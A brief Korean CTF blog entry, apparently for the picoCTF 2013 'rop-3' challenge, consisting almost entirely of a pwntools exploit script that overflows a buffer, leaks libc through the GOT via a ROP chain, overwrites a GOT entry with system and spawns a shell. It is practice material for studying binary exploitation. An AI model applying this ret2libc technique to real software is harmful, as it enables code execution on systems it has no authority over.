rop1,2와 동일하게 품


exploit code

from pwn import *
 
p = process('./rop3-7f3312fe43c46d26')
 
read_plt = 0x8048360
read_got = 0x804a000
write_plt = 0x80483a0
write_got = 0x804a010
bss = 0x804a020
system_offset = 0x9ad60 
pppr = 0x804855d
pr = 0x8048344
binsh = "/bin/sh"
 
payload = "A"*140 
payload += p32(write_plt)
payload += p32(pppr)
payload += p32(1)
payload += p32(read_got)
payload += p32(4)
 
payload += p32(read_plt)
payload += p32(pppr)
payload += p32(0)
payload += p32(bss)
payload += p32(len(binsh)+1)
 
payload += p32(read_plt)
payload += p32(pppr)
payload += p32(0)
payload += p32(write_got)
payload += p32(4)
 
payload += p32(write_plt)
payload += p32(pr) 
payload += p32(bss)
 
log.info("Exploit..")
p.sendline(payload)
 
read_addr = u32(p.recv()[-4:])
log.info("read_addr = {}".format(hex(read_addr)))
system_addr = read_addr - system_offset
log.info("system_addr = {}".format(hex(system_addr)))
 
p.sendline(binsh)
p.sendline(p32(system_addr))
p.interactive()

'CTF' 카테고리의 다른 글

CodeGate 2017 babypwn  (1) 2018.07.18
pico-ctf-2013 rop-4  (0) 2018.07.17
pico-ctf-2013 rop-2  (0) 2018.07.14
pico-ctf-2013 rop-1  (0) 2018.07.14
PlaidCTF 2013 ropasaurusrex  (0) 2018.07.14

+ Recent posts